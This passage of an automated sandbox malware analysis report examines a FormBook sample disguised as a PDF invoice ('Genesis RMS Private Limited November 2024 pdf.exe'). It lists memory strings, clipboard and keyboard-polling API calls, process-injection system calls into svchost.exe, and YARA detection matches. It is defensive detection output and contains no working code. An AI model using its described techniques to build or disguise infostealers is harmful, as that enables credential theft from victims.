          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1694937333.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4139053792.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C425A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007C4458
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C425A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007B0219
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007DCDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Genesis RMS Private Limited November 2024 pdf.exe PID: 7684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00753B4C
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5a075fd7-a
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3d4df871-c
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e84c14f1-c
          Source: Genesis RMS Private Limited November 2024 pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e01b7b52-1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A320 NtCreateFile,1_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3D0 NtReadFile,1_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A450 NtClose,1_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A500 NtAllocateVirtualMemory,1_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A31A NtCreateFile,1_2_0041A31A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A3CD NtReadFile,1_2_0041A3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A44A NtClose,1_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B60 NtClose,LdrInitializeThunk,1_2_03372B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03372BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AD0 NtReadFile,LdrInitializeThunk,1_2_03372AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F30 NtCreateSection,LdrInitializeThunk,1_2_03372F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FB0 NtResumeThread,LdrInitializeThunk,1_2_03372FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03372F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FE0 NtCreateFile,LdrInitializeThunk,1_2_03372FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03372EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03372E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03372D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03372D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03372DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DD0 NtDelayExecution,LdrInitializeThunk,1_2_03372DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03372CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374340 NtSetContextThread,1_2_03374340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374650 NtSuspendThread,1_2_03374650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BA0 NtEnumerateValueKey,1_2_03372BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B80 NtQueryInformationFile,1_2_03372B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BE0 NtQueryValueKey,1_2_03372BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AB0 NtWaitForSingleObject,1_2_03372AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AF0 NtWriteFile,1_2_03372AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F60 NtCreateProcessEx,1_2_03372F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FA0 NtQuerySection,1_2_03372FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E30 NtWriteVirtualMemory,1_2_03372E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EE0 NtQueueApcThread,1_2_03372EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D00 NtSetInformationFile,1_2_03372D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DB0 NtEnumerateKey,1_2_03372DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C00 NtQueryInformationProcess,1_2_03372C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C70 NtFreeVirtualMemory,1_2_03372C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C60 NtCreateKey,1_2_03372C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CF0 NtOpenProcess,1_2_03372CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CC0 NtQueryVirtualMemory,1_2_03372CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373010 NtOpenDirectoryObject,1_2_03373010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373090 NtSetValueKey,1_2_03373090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033735C0 NtCreateMutant,1_2_033735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033739B0 NtGetContextThread,1_2_033739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D10 NtOpenProcessToken,1_2_03373D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D70 NtOpenThread,1_2_03373D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,1_2_029EA036
